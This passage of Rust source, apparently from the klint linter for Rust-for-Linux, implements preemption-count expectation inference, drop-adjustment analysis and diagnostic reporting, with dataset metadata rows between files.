                                instance: typing_env.as_query_input(instance),
                                kind: UseSiteKind::Call(span.primary_span().unwrap_or(DUMMY_SP)),
                            });
                            let result = self.report_instance_expectation_error(
                                typing_env,
                                callee_instance,
                                call_expected,
                                span,
                                diag,
                            );
                            self.call_stack.borrow_mut().pop();
                            result?
                        }
                    } else {
                        // Indirect call: report against the assumed default.
                        diag.span_note(
                            span,
                            format!(
                                "which performs indirect function call with preemption count {}",
                                expected
                            ),
                        );
                        diag.note(format!(
                            "but indirect function calls are assumed to expect {}",
                            crate::atomic_context::INDIRECT_DEFAULT.1
                        ));
                        return Ok(());
                    }
                }
                TerminatorKind::Drop { place, .. } => {
                    let span = span.unwrap_or_else(|| {
                        let mut multispan =
                            MultiSpan::from_span(data.terminator().source_info.span);
                        multispan.push_span_label(
                            body.local_decls[place.local].source_info.span,
                            "value being dropped is here",
                        );
                        multispan
                    });
                    let ty = place.ty(body, self.tcx).ty;
                    let ty = instance.instantiate_mir_and_normalize_erasing_regions(
                        self.tcx,
                        typing_env,
                        ty::EarlyBinder::bind(ty),
                    );
                    self.call_stack.borrow_mut().push(UseSite {
                        instance: typing_env.as_query_input(instance),
                        kind: UseSiteKind::Drop {
                            drop_span: data.terminator().source_info.span,
                            place_span: body.local_decls[place.local].source_info.span,
                        },
                    });
                    let result = self.report_drop_expectation_error(
                        typing_env,
                        ty,
                        call_expected,
                        span,
                        diag,
                    );
                    self.call_stack.borrow_mut().pop();
                    result?;
                }
                _ => (),
            };
            // Only the first violating terminator is reported.
            return Ok(());
        }
        // Reaching here means no violating terminator was found, contradicting
        // the caller's precondition that this body contains an error.
        bug!("failed to report error on {:?}", instance);
    }
    /// Expectation error reporting is similar to expectation inference, but the direction is reverted.
    /// For inference, we first determine the range of preemption count of the callee, and then combine
    /// all call-sites to determine the preemption count requirement of the outer function. For reporting,
    /// we have a pre-determined expectation, and then we need to recurse into the callees to find a violation.
    ///
    /// Must only be called on instances that actually are errors.
    pub fn report_instance_expectation_error<G: EmissionGuarantee>(
        &self,
        typing_env: TypingEnv<'tcx>,
        instance: Instance<'tcx>,
        expected: ExpectationRange,
        span: MultiSpan,
        diag: &mut rustc_errors::Diag<'_, G>,
    ) -> Result<(), Error> {
        match instance.def {
            // No Rust built-in intrinsics will mess with preemption count.
            ty::InstanceKind::Intrinsic(_) => unreachable!(),
            // Empty drop glue, then it definitely won't mess with preemption count.
            ty::InstanceKind::DropGlue(_, None) => unreachable!(),
            ty::InstanceKind::DropGlue(_, Some(ty)) => {
                return self.report_drop_expectation_error(typing_env, ty, expected, span, diag);
            }
            // Checked by indirect checks
            ty::InstanceKind::Virtual(def_id, _) => {
                // For a vcall we can only report the annotated (or default)
                // expectation of the trait method itself.
                let exp = self
                    .preemption_count_annotation(def_id)
                    .expectation
                    .unwrap_or(crate::atomic_context::VCALL_DEFAULT.1);
                diag.span_note(
                    span,
                    format!(
                        "which may call this dynamic dispatch with preemption count {}",
                        expected
                    ),
                );
                diag.note(format!(
                    "but this dynamic dispatch expects preemption count {}",
                    exp
                ));
                return Ok(());
            }
            _ => (),
        }
        if self.is_foreign_item(instance.def_id()) {
            // FFI calls use the declared FFI property or the FFI default.
            let exp = self
                .ffi_property(instance)
                .unwrap_or(crate::atomic_context::FFI_USE_DEFAULT)
                .1;
            diag.span_note(
                span,
                format!(
                    "which may perform this FFI call with preemption count {}",
                    expected
                ),
            );
            diag.note(format!("but the callee expects preemption count {}", exp));
            return Ok(());
        }
        // Only check locally codegenned instances.
        if !self.tcx.should_codegen_locally(instance) {
            let expectation = self.instance_expectation(typing_env.as_query_input(instance))?;
            diag.span_note(
                span,
                format!(
                    "which may call this function with preemption count {}",
                    expected
                ),
            );
            diag.note(format!(
                "but this function expects preemption count {}",
                expectation
            ));
            return Ok(());
        }
        diag.span_note(
            span,
            format!(
                "which may call this function with preemption count {}",
                expected
            ),
        );
        // Recurse into the body to pinpoint the offending terminator.
        let body = self.analysis_instance_mir(instance.def);
        self.report_body_expectation_error(typing_env, instance, body, expected, None, diag)
    }
    /// Attach notes to `diag` explaining why dropping `ty` with preemption
    /// count `expected` violates the drop glue's expectation.
    ///
    /// Structurally recurses through closures, boxes, arrays and slices to
    /// locate the component whose destructor actually carries the violated
    /// expectation, falling back to the generated drop shim otherwise.
    /// Must only be called when `ty` needs drop and an error is known to exist.
    pub fn report_drop_expectation_error<G: EmissionGuarantee>(
        &self,
        typing_env: TypingEnv<'tcx>,
        ty: Ty<'tcx>,
        expected: ExpectationRange,
        span: MultiSpan,
        diag: &mut rustc_errors::Diag<'_, G>,
    ) -> Result<(), Error> {
        // If the type doesn't need drop, then there is trivially no expectation.
        assert!(ty.needs_drop(self.tcx, typing_env));
        match ty.kind() {
            ty::Closure(_, args) => {
                // Dropping a closure drops its captured upvars.
                return self.report_drop_expectation_error(
                    typing_env,
                    args.as_closure().tupled_upvars_ty(),
                    expected,
                    span,
                    diag,
                );
            }
            // Coroutine drops are non-trivial, use the generated drop shims instead.
            ty::Coroutine(..) => (),
            ty::Tuple(_list) => (),
            _ if let Some(boxed_ty) = ty.boxed_ty() => {
                // If the content's drop is the violation, recurse there;
                // otherwise the violation comes from freeing the box, offset
                // by the adjustment of dropping the content first.
                let exp = self.drop_expectation(typing_env.as_query_input(boxed_ty))?;
                if !exp.contains_range(expected) {
                    return self
                        .report_drop_expectation_error(typing_env, boxed_ty, expected, span, diag);
                }
                let adj = self.drop_adjustment(typing_env.as_query_input(boxed_ty))?;
                let drop_trait = self.require_lang_item(LangItem::Drop, DUMMY_SP);
                let drop_fn = self.associated_item_def_ids(drop_trait)[0];
                let box_free = ty::Instance::try_resolve(
                    self.tcx,
                    typing_env,
                    drop_fn,
                    self.mk_args(&[ty.into()]),
                )
                .unwrap()
                .unwrap();
                return self.report_instance_expectation_error(
                    typing_env,
                    box_free,
                    expected + adj,
                    span,
                    diag,
                );
            }
            ty::Adt(def, _) => {
                // An explicit annotation on the ADT's drop stops the recursion
                // with a direct note.
                if let Some(exp) = self.drop_preemption_count_annotation(def.did()).expectation {
                    diag.span_note(
                        span,
                        format!("which may drop here with preemption count {}", expected),
                    );
                    diag.note(format!("but this drop expects preemption count {}", exp));
                    return Ok(());
                }
            }
            ty::Dynamic(pred, ..) => {
                // Virtual drop: report the principal trait's annotated (or
                // default) drop expectation.
                let exp = pred
                    .principal_def_id()
                    .and_then(|principal_trait| {
                        self.drop_preemption_count_annotation(principal_trait)
                            .expectation
                    })
                    .unwrap_or(crate::atomic_context::VDROP_DEFAULT.1);
                diag.span_note(
                    span,
                    format!("which may drop here with preemption count {}", expected),
                );
                diag.note(format!("but this drop expects preemption count {}", exp));
                return Ok(());
            }
            ty::Array(elem_ty, size) => {
                // If a single element drop already violates, report that;
                // otherwise the violation arises from the accumulated
                // per-element adjustment, so report the last element's drop.
                let param_and_elem_ty = typing_env.as_query_input(*elem_ty);
                let elem_exp = self.drop_expectation(param_and_elem_ty)?;
                if !elem_exp.contains_range(expected) {
                    return self
                        .report_drop_expectation_error(typing_env, *elem_ty, expected, span, diag);
                }
                let elem_adj = self.drop_adjustment(param_and_elem_ty)?;
                let infcx = self.tcx.infer_ctxt().build(TypingMode::PostAnalysis);
                let size = rustc_trait_selection::traits::evaluate_const(
                    &infcx,
                    *size,
                    typing_env.param_env,
                )
                .try_to_target_usize(self.tcx)
                .ok_or(Error::TooGeneric)?;
                let Ok(size) = i32::try_from(size) else {
                    return Ok(());
                };
                let Some(last_adj) = (size - 1).checked_mul(elem_adj) else {
                    return Ok(());
                };
                return self.report_drop_expectation_error(
                    typing_env,
                    *elem_ty,
                    expected + last_adj,
                    span,
                    diag,
                );
            }
            ty::Slice(elem_ty) => {
                return self
                    .report_drop_expectation_error(typing_env, *elem_ty, expected, span, diag);
            }
            _ => unreachable!(),
        }
        diag.span_note(
            span,
            format!(
                "which may drop type `{}` with preemption count {}",
                PolyDisplay(&typing_env.as_query_input(ty)),
                expected,
            ),
        );
        // The note above already points at the drop site, so recurse with an
        // empty span.
        let span = MultiSpan::new();
        // Do not call `resolve_drop_in_place` because we need typing_env.
        let drop_in_place = self.require_lang_item(LangItem::DropInPlace, DUMMY_SP);
        let args = self.mk_args(&[ty.into()]);
        let instance = ty::Instance::try_resolve(self.tcx, typing_env, drop_in_place, args)
            .unwrap()
            .unwrap();
        let mir = crate::mir::drop_shim::build_drop_shim(self, instance.def_id(), typing_env, ty);
        self.report_body_expectation_error(typing_env, instance, &mir, expected, Some(span), diag)
    }
    /// Infer the preemption count expectation of `body`.
    ///
    /// Runs the adjustment dataflow, then intersects (meets) the expectation
    /// contributed by every reachable call/drop terminator, shifted by the
    /// adjustment at its block. If the intersection becomes empty, no entry
    /// preemption count can satisfy all uses, and an error is emitted.
    pub fn do_infer_expectation(
        &self,
        typing_env: TypingEnv<'tcx>,
        instance: Instance<'tcx>,
        body: &Body<'tcx>,
    ) -> Result<ExpectationRange, Error> {
        // Debugging aid: flip to `true` locally to dump the MIR being analysed.
        if false {
            let writer = rustc_middle::mir::pretty::MirWriter::new(self.tcx);
            writer.write_mir_fn(body, &mut std::io::stderr()).unwrap();
        }
        let mut analysis_result = AdjustmentComputation {
            checker: self,
            body,
            typing_env,
            instance,
        }
        .iterate_to_fixpoint(self.tcx, body, None)
        .into_results_cursor(body);
        let mut expectation_infer = ExpectationRange::top();
        for (b, data) in rustc_middle::mir::traversal::reachable(body) {
            if data.is_cleanup {
                continue;
            }
            let expectation =
                self.terminator_expectation(typing_env, instance, body, data.terminator())?;
            // Special case for no expectation at all. No need to check adjustment here.
            if expectation == ExpectationRange::top() {
                continue;
            }
            analysis_result.seek_to_block_start(b);
            let adjustment = analysis_result.get().into_result()?;
            // We need to find a range that for all possible values in `adj`, it will end up in a value
            // that lands inside `expectation`.
            //
            // For example, if adjustment is `0..`, and range is `0..1`, then the range we want is `0..0`,
            // i.e. an empty range, because no matter what preemption count we start with, if we apply an
            // adjustment >0, then it will be outside the range.
            let mut expected = expectation - adjustment;
            expected.meet(&expectation_infer);
            if expected.is_empty() {
                // This function will cause the entry state to be in an unsatisfiable condition.
                // Generate an error.
                let (kind, drop_place) = match data.terminator().kind {
                    TerminatorKind::Drop { place, .. } => ("drop", Some(place)),
                    _ => ("call", None),
                };
                let span = data.terminator().source_info.span;
                let mut diag = self.tcx.dcx().struct_span_err(
                    span,
                    format!(
                        "this {kind} expects the preemption count to be {}",
                        expectation
                    ),
                );
                if let Some(place) = drop_place {
                    let span = body.local_decls[place.local].source_info.span;
                    diag.span_label(span, "the value being dropped is declared here");
                    let ty = place.ty(body, self.tcx).ty;
                    let ty = instance.instantiate_mir_and_normalize_erasing_regions(
                        self.tcx,
                        typing_env,
                        ty::EarlyBinder::bind(ty),
                    );
                    diag.span_label(span, format!("the type being dropped is `{ty}`"));
                }
                diag.note(format!(
                    "but the possible preemption count at this point is {}",
                    expectation_infer + adjustment
                ));
                // Stop processing other calls in this function to avoid generating too many errors.
                return Err(Error::Error(self.emit_with_use_site_info(diag)));
            }
            expectation_infer = expected;
        }
        Ok(expectation_infer)
    }
pub fn infer_expectation(
&self,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
body: &Body<'tcx>,
) -> Result<ExpectationRange, Error> {
if !self
.recursion_limit()
.value_within_limit(self.call_stack.borrow().len())
{
self.emit_with_use_site_info(self.dcx().struct_fatal(format!(
"reached the recursion limit while checking expectation for `{}`",
PolyDisplay(&typing_env.as_query_input(instance))
)));
}
rustc_data_structures::stack::ensure_sufficient_stack(|| {
self.do_infer_expectation(typing_env, instance, body)
})
}
}
memoize!(
#[instrument(skip(cx), fields(poly_ty = %PolyDisplay(&poly_ty)), ret)]
pub fn drop_expectation<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_ty: PseudoCanonicalInput<'tcx, Ty<'tcx>>,
) -> Result<ExpectationRange, Error> {
let PseudoCanonicalInput {
typing_env,
value: ty,
} = poly_ty;
// If the type doesn't need drop, then there is trivially no expectation.
if !ty.needs_drop(cx.tcx, typing_env) {
return Ok(ExpectationRange::top());
}
match ty.kind() {
ty::Closure(_, args) => {
return cx.drop_expectation(
typing_env.as_query_input(args.as_closure().tupled_upvars_ty()),
);
}
// Coroutine drops are non-trivial, use the generated drop shims instead.
ty::Coroutine(..) => (),
ty::Tuple(_list) => (),
_ if let Some(boxed_ty) = ty.boxed_ty() => {
let exp = cx.drop_expectation(typing_env.as_query_input(boxed_ty))?;
let drop_trait = cx.require_lang_item(LangItem::Drop, DUMMY_SP);
let drop_fn = cx.associated_item_def_ids(drop_trait)[0];
let box_free = ty::Instance::try_resolve(
cx.tcx,
typing_env,
drop_fn,
cx.mk_args(&[ty.into()]),
)
.unwrap()
.unwrap();
let box_free_exp = cx.instance_expectation(typing_env.as_query_input(box_free))?;
// Usuaully freeing the box shouldn't have any instance expectations, so short circuit here.
if box_free_exp == ExpectationRange::top() {
return Ok(exp);
}
let adj = cx.drop_adjustment(typing_env.as_query_input(boxed_ty))?;
let mut expected = box_free_exp - adj;
expected.meet(&exp);
if expected.is_empty() {
let mut diag = cx.dcx().struct_err(format!(
"freeing the box expects the preemption count to be {}",
box_free_exp
));
diag.note(format!(
"but the possible preemption count after dropping the content is {}",
exp + adj
));
diag.note(format!("content being dropped is `{}`", boxed_ty));
return Err(Error::Error(cx.emit_with_use_site_info(diag)));
}
return Ok(expected);
}
ty::Adt(def, _) => {
// For Adts, we first try to not use any of the args and just try the most
// polymorphic version of the type.
let poly_typing_env = TypingEnv::post_analysis(cx.tcx, def.did());
let poly_args = cx
.erase_and_anonymize_regions(GenericArgs::identity_for_item(cx.tcx, def.did()));
let poly_poly_ty = poly_typing_env
.as_query_input(cx.tcx.mk_ty_from_kind(ty::Adt(*def, poly_args)));
if poly_poly_ty != poly_ty {
match cx.drop_expectation(poly_poly_ty) {
Err(Error::TooGeneric) => (),
expectation => return expectation,
}
}
// If that fails, we try to use the args.
// Fallthrough to the MIR drop shim based logic.
if let Some(exp) = cx.drop_preemption_count_annotation(def.did()).expectation {
info!("expectation {} from annotation", exp);
return Ok(exp);
}
}
ty::Dynamic(pred, ..) => {
if let Some(principal_trait) = pred.principal_def_id() {
if let Some(exp) = cx
.drop_preemption_count_annotation(principal_trait)
.expectation
{
return Ok(exp);
}
}
return Ok(crate::atomic_context::VDROP_DEFAULT.1);
}
ty::Array(elem_ty, size) => {
let infcx = cx.tcx.infer_ctxt().build(TypingMode::PostAnalysis);
let size = rustc_trait_selection::traits::evaluate_const(
&infcx,
*size,
typing_env.param_env,
)
.try_to_target_usize(cx.tcx)
.ok_or(Error::TooGeneric);
if size == Ok(0) {
return Ok(ExpectationRange::top());
}
// Special case for no expectation at all. No need to check adjustment here.
let param_and_elem_ty = typing_env.as_query_input(*elem_ty);
let elem_exp = cx.drop_expectation(param_and_elem_ty)?;
if elem_exp == ExpectationRange::top() {
return Ok(ExpectationRange::top());
}
let elem_adj = cx.drop_adjustment(param_and_elem_ty)?;
if elem_adj == 0 {
return Ok(elem_exp);
}
// If any error happens here, it'll happen in adjustment calculation too, so just return
// to avoid duplicate errors.
let Ok(size) = i32::try_from(size?) else {
return Ok(ExpectationRange::top());
};
let Some(last_adj) = (size - 1).checked_mul(elem_adj) else {
return Ok(ExpectationRange::top());
};
let mut expected = elem_exp - last_adj;
expected.meet(&elem_exp);
if expected.is_empty() {
let mut diag = cx.dcx().struct_err(format!(
"dropping element of array expects the preemption count to be {}",
elem_exp
));
diag.note(format!(
"but the possible preemption count when dropping the last element is {}",
elem_exp + last_adj
));
diag.note(format!("array being dropped is `{}`", ty));
return Err(Error::Error(cx.emit_with_use_site_info(diag)));
}
return Ok(expected);
}
ty::Slice(elem_ty) => {
// We can assume adjustment here is 0 otherwise the adjustment calculation
// logic would have complained.
return cx.drop_expectation(typing_env.as_query_input(*elem_ty));
}
_ => return Err(Error::TooGeneric),
}
// Do not call `resolve_drop_in_place` because we need typing_env.
let drop_in_place = cx.require_lang_item(LangItem::DropInPlace, DUMMY_SP);
let args = cx.mk_args(&[ty.into()]);
let instance = ty::Instance::try_resolve(cx.tcx, typing_env, drop_in_place, args)
.unwrap()
.unwrap();
let poly_instance = typing_env.as_query_input(instance);
assert!(matches!(
instance.def,
ty::InstanceKind::DropGlue(_, Some(_))
));
if cx
.call_stack
.borrow()
.iter()
.rev()
.any(|x| x.instance == poly_instance)
{
// Recursion encountered.
if typing_env.param_env.caller_bounds().is_empty() {
return Ok(ExpectationRange::top());
} else {
// If we are handling generic functions, then defer decision to monomorphization time.
return Err(Error::TooGeneric);
}
}
let mir = crate::mir::drop_shim::build_drop_shim(cx, instance.def_id(), typing_env, ty);
let result = cx.infer_expectation(typing_env, instance, &mir);
// Recursion encountered.
if let Some(&recur) = cx.query_cache::<drop_expectation>().borrow().get(&poly_ty) {
match (result, recur) {
(_, Err(Error::Error(_))) => bug!("recursive callee errors"),
// Error already reported.
(Err(Error::Error(_)), _) => (),
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | true |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/preempt_count/mod.rs | src/preempt_count/mod.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
pub mod adjustment;
pub mod annotation;
pub mod check;
pub mod dataflow;
pub mod expectation;
use rustc_errors::ErrorGuaranteed;
use rustc_mir_dataflow::lattice::FlatSet;
use crate::lattice::MeetSemiLattice;
#[derive(Clone, Copy, Debug, PartialEq, Eq, Encodable, Decodable)]
pub enum Error {
TooGeneric,
Error(ErrorGuaranteed),
}
/// Range of preemption count that the function expects.
///
/// Since the preemption count is a non-negative integer, the lower bound is just represented using a `u32`
/// and "no expectation" is represented with 0; the upper bound is represented using an `Option<u32>`, with
/// `None` representing "no expectation". The upper bound is exclusive so `(0, Some(0))` represents an
/// unsatisfiable condition.
#[derive(Clone, Copy, Debug, PartialEq, Eq, Encodable, Decodable)]
pub struct ExpectationRange {
pub lo: u32,
pub hi: Option<u32>,
}
impl ExpectationRange {
pub const fn top() -> Self {
Self { lo: 0, hi: None }
}
pub const fn single_value(v: u32) -> Self {
Self {
lo: v,
hi: Some(v + 1),
}
}
pub fn is_empty(&self) -> bool {
if let Some(hi) = self.hi {
self.lo >= hi
} else {
false
}
}
pub fn contains_range(&self, mut other: Self) -> bool {
!other.meet(self)
}
}
impl MeetSemiLattice for ExpectationRange {
fn meet(&mut self, other: &Self) -> bool {
let mut changed = false;
if self.lo < other.lo {
self.lo = other.lo;
changed = true;
}
match (self.hi, other.hi) {
(_, None) => (),
(None, Some(_)) => {
self.hi = other.hi;
changed = true;
}
(Some(a), Some(b)) => {
if a > b {
self.hi = Some(b);
changed = true;
}
}
}
changed
}
}
impl std::fmt::Display for ExpectationRange {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match (self.lo, self.hi) {
(lo, None) => write!(f, "{}..", lo),
(lo, Some(hi)) if lo >= hi => write!(f, "unsatisfiable"),
(lo, Some(hi)) if lo + 1 == hi => write!(f, "{lo}"),
(lo, Some(hi)) => write!(f, "{}..{}", lo, hi),
}
}
}
fn saturating_add(x: u32, y: i32) -> u32 {
let (res, overflow) = x.overflowing_add(y as u32);
if overflow == (y < 0) {
res
} else if overflow {
u32::MAX
} else {
0
}
}
impl std::ops::Add<i32> for ExpectationRange {
type Output = Self;
fn add(self, rhs: i32) -> Self::Output {
Self {
lo: saturating_add(self.lo, rhs),
hi: self.hi.map(|hi| saturating_add(hi, rhs)),
}
}
}
impl std::ops::Sub<i32> for ExpectationRange {
type Output = Self;
fn sub(self, rhs: i32) -> Self::Output {
Self {
lo: saturating_add(self.lo, -rhs),
hi: self.hi.map(|hi| saturating_add(hi, -rhs)),
}
}
}
impl std::ops::Add<FlatSet<i32>> for ExpectationRange {
type Output = Self;
fn add(self, rhs: FlatSet<i32>) -> Self::Output {
match rhs {
FlatSet::Bottom => self,
FlatSet::Elem(v) => self + v,
FlatSet::Top => Self::top(),
}
}
}
impl std::ops::Sub<FlatSet<i32>> for ExpectationRange {
type Output = Self;
fn sub(self, rhs: FlatSet<i32>) -> Self::Output {
match rhs {
FlatSet::Bottom => self,
FlatSet::Elem(v) => self - v,
FlatSet::Top => Self { lo: 0, hi: Some(0) },
}
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/preempt_count/adjustment.rs | src/preempt_count/adjustment.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_errors::{Diag, EmissionGuarantee, ErrorGuaranteed};
use rustc_hir::LangItem;
use rustc_hir::def_id::CrateNum;
use rustc_middle::mir::{Body, TerminatorKind, UnwindAction};
use rustc_middle::ty::{
self, GenericArgs, Instance, PseudoCanonicalInput, Ty, TypingEnv, TypingMode,
};
use rustc_mir_dataflow::Analysis;
use rustc_mir_dataflow::JoinSemiLattice;
use rustc_mir_dataflow::lattice::FlatSet;
use rustc_span::DUMMY_SP;
use rustc_trait_selection::infer::TyCtxtInferExt;
use super::Error;
use super::dataflow::{AdjustmentComputation, MaybeError};
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::PolyDisplay;
impl<'tcx> AnalysisCtxt<'tcx> {
fn drop_adjustment_overflow(
&self,
poly_ty: PseudoCanonicalInput<'tcx, Ty<'tcx>>,
) -> Result<!, Error> {
let diag = self.dcx().struct_err(format!(
"preemption count overflow when trying to compute adjustment of type `{}",
PolyDisplay(&poly_ty)
));
Err(Error::Error(self.emit_with_use_site_info(diag)))
}
pub fn emit_with_use_site_info<G: EmissionGuarantee>(
&self,
mut diag: Diag<'tcx, G>,
) -> G::EmitResult {
let call_stack = self.call_stack.borrow();
if call_stack.len() > 4 && !self.recursion_limit().value_within_limit(call_stack.len()) {
// This is recursion limit overflow, we don't want to spam the screen
self.note_use_stack(&mut diag, &call_stack[call_stack.len() - 2..]);
diag.note(format!(
"{} calls omitted due to recursion",
call_stack.len() - 4
));
self.note_use_stack(&mut diag, &call_stack[..2]);
} else {
self.note_use_stack(&mut diag, &call_stack);
}
diag.emit()
}
fn report_adjustment_infer_error<'mir>(
&self,
instance: Instance<'tcx>,
body: &'mir Body<'tcx>,
results: &mut rustc_mir_dataflow::ResultsCursor<
'mir,
'tcx,
AdjustmentComputation<'mir, 'tcx, '_>,
>,
) -> ErrorGuaranteed {
// First step, see if there are any path that leads to a `return` statement have `Top` directly.
let mut return_bb = None;
for (b, data) in rustc_middle::mir::traversal::reachable(body) {
match data.terminator().kind {
TerminatorKind::Return => (),
_ => continue,
}
results.seek_to_block_start(b);
// We can unwrap here because if this function is called, we know that no paths to `Return`
// can contain `TooGeneric` or `Error` otherwise we would have returned early (in caller).
if matches!(results.get().unwrap(), FlatSet::Elem(_)) {
continue;
}
return_bb = Some(b);
break;
}
// A catch-all error. MIR building usually should just have one `Return` terminator
// so this usually shouldn't happen.
let Some(return_bb) = return_bb else {
return self.emit_with_use_site_info(self.tcx.dcx().struct_span_err(
self.tcx.def_span(instance.def_id()),
"cannot infer preemption count adjustment of this function",
));
};
// Find the deepest block in the dominator tree with good value on block start.
let mut first_problematic_block = return_bb;
let dominators = body.basic_blocks.dominators();
loop {
let b = dominators
.immediate_dominator(first_problematic_block)
.expect("block not reachable!");
if b == first_problematic_block {
// Shouldn't actually happen because the entry block should always be good.
break;
}
results.seek_to_block_start(b);
if matches!(results.get().unwrap(), FlatSet::Elem(_)) {
break;
}
first_problematic_block = b;
}
// For this problematic block, try use a span that closest to the beginning of it.
let span = body.basic_blocks[first_problematic_block]
.statements
.first()
.map(|x| x.source_info.span)
.unwrap_or_else(|| {
body.basic_blocks[first_problematic_block]
.terminator()
.source_info
.span
});
let mut diag = self.tcx.dcx().struct_span_err(
span,
"cannot infer preemption count adjustment at this point",
);
let mut count = 0;
for mut prev_block in body.basic_blocks.predecessors()[first_problematic_block]
.iter()
.copied()
{
results.seek_to_block_end(prev_block);
let mut end_adjustment = results.get().unwrap();
results.seek_to_block_start(prev_block);
let mut start_adjustment = results.get().unwrap();
// If this block has made no changes to the adjustment, backtrack to the predecessors block
// that made the change.
while start_adjustment == end_adjustment {
let pred = &body.basic_blocks.predecessors()[prev_block];
// Don't continue backtracking if there are multiple predecessors.
if pred.len() != 1 {
break;
}
let b = pred[0];
// Don't continue backtracking if the predecessor block has multiple successors.
let terminator = body.basic_blocks[b].terminator();
let successor_count = terminator.successors().count();
let has_unwind = terminator
.unwind()
.map(|x| matches!(x, UnwindAction::Cleanup(_)))
.unwrap_or(false);
let normal_successor = successor_count - has_unwind as usize;
if normal_successor != 1 {
break;
}
prev_block = b;
results.seek_to_block_end(prev_block);
end_adjustment = results.get().unwrap();
results.seek_to_block_start(prev_block);
start_adjustment = results.get().unwrap();
}
let terminator = body.basic_blocks[prev_block].terminator();
let span = match terminator.kind {
TerminatorKind::Goto { .. } => {
// Goto terminator of `if .. { .. } else { .. }` has span on the entire expression,
// which is not very useful.
// In this case we use the last statement's span instead.
body.basic_blocks[prev_block]
.statements
.last()
.map(|x| x.source_info)
.unwrap_or_else(|| terminator.source_info)
.span
}
_ => terminator.source_info.span,
};
let mut msg = match (start_adjustment, end_adjustment) {
(FlatSet::Bottom, _) | (_, FlatSet::Bottom) => unreachable!(),
(FlatSet::Top, _) => {
format!(
"preemption count adjustment is changed in the previous iteration of the loop"
)
}
(_, FlatSet::Top) => unreachable!(),
(_, FlatSet::Elem(elem)) => {
format!("preemption count adjustment is {} after this", elem)
}
};
match count {
0 => (),
1 => msg = format!("while {}", msg),
_ => msg = format!("and {}", msg),
}
count += 1;
diag.span_note(span, msg);
}
self.emit_with_use_site_info(diag)
}
pub fn do_infer_adjustment(
&self,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
body: &Body<'tcx>,
) -> Result<i32, Error> {
if self.should_dump_mir(instance.def_id()) {
let writer = rustc_middle::mir::pretty::MirWriter::new(self.tcx);
writer.write_mir_fn(body, &mut std::io::stderr()).unwrap();
}
let mut analysis_result = AdjustmentComputation {
checker: self,
body,
typing_env,
instance,
}
.iterate_to_fixpoint(self.tcx, body, None)
.into_results_cursor(body);
let mut adjustment = MaybeError::Ok(FlatSet::Bottom);
for (b, data) in rustc_middle::mir::traversal::reachable(body) {
match data.terminator().kind {
TerminatorKind::Return => {
analysis_result.seek_to_block_start(b);
adjustment.join(analysis_result.get());
}
_ => (),
}
}
let adjustment = adjustment.into_result()?;
let adjustment = match adjustment {
FlatSet::Bottom => {
// Diverging function, any value is fine, use the default 0.
0
}
FlatSet::Elem(v) => v,
FlatSet::Top => {
return Err(Error::Error(self.report_adjustment_infer_error(
instance,
body,
&mut analysis_result,
)));
}
};
Ok(adjustment)
}
pub fn infer_adjustment(
&self,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
body: &Body<'tcx>,
) -> Result<i32, Error> {
if !self
.recursion_limit()
.value_within_limit(self.call_stack.borrow().len())
{
self.emit_with_use_site_info(self.dcx().struct_fatal(format!(
"reached the recursion limit while checking adjustment for `{}`",
PolyDisplay(&typing_env.as_query_input(instance))
)));
}
rustc_data_structures::stack::ensure_sufficient_stack(|| {
self.do_infer_adjustment(typing_env, instance, body)
})
}
}
memoize!(
#[instrument(skip(cx), fields(poly_ty = %PolyDisplay(&poly_ty)), ret)]
pub fn drop_adjustment<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_ty: PseudoCanonicalInput<'tcx, Ty<'tcx>>,
) -> Result<i32, Error> {
let PseudoCanonicalInput {
typing_env,
value: ty,
} = poly_ty;
// If the type doesn't need drop, then there is trivially no adjustment.
if !ty.needs_drop(cx.tcx, typing_env) {
return Ok(0);
}
match ty.kind() {
ty::Closure(_, args) => {
return cx.drop_adjustment(
typing_env.as_query_input(args.as_closure().tupled_upvars_ty()),
);
}
// Coroutine drops are non-trivial, use the generated drop shims instead.
ty::Coroutine(..) => (),
ty::Tuple(list) => {
let mut adj = 0i32;
for elem_ty in list.iter() {
let elem_adj = cx.drop_adjustment(typing_env.as_query_input(elem_ty))?;
let Some(new_adj) = adj.checked_add(elem_adj) else {
cx.drop_adjustment_overflow(poly_ty)?
};
adj = new_adj;
}
return Ok(adj);
}
_ if let Some(boxed_ty) = ty.boxed_ty() => {
let adj = cx.drop_adjustment(typing_env.as_query_input(boxed_ty))?;
let drop_trait = cx.require_lang_item(LangItem::Drop, DUMMY_SP);
let drop_fn = cx.associated_item_def_ids(drop_trait)[0];
let box_free = ty::Instance::try_resolve(
cx.tcx,
typing_env,
drop_fn,
cx.mk_args(&[ty.into()]),
)
.unwrap()
.unwrap();
let box_free_adj = cx.instance_adjustment(typing_env.as_query_input(box_free))?;
let Some(adj) = adj.checked_add(box_free_adj) else {
cx.drop_adjustment_overflow(poly_ty)?
};
return Ok(adj);
}
ty::Adt(def, _) => {
// For Adts, we first try to not use any of the args and just try the most
// polymorphic version of the type.
let poly_typing_env = TypingEnv::post_analysis(cx.tcx, def.did());
let poly_args = cx
.erase_and_anonymize_regions(GenericArgs::identity_for_item(cx.tcx, def.did()));
let poly_poly_ty = poly_typing_env
.as_query_input(cx.tcx.mk_ty_from_kind(ty::Adt(*def, poly_args)));
if poly_poly_ty != poly_ty {
match cx.drop_adjustment(poly_poly_ty) {
Err(Error::TooGeneric) => (),
adjustment => return adjustment,
}
}
// If that fails, we try to use the args.
// Fallthrough to the MIR drop shim based logic.
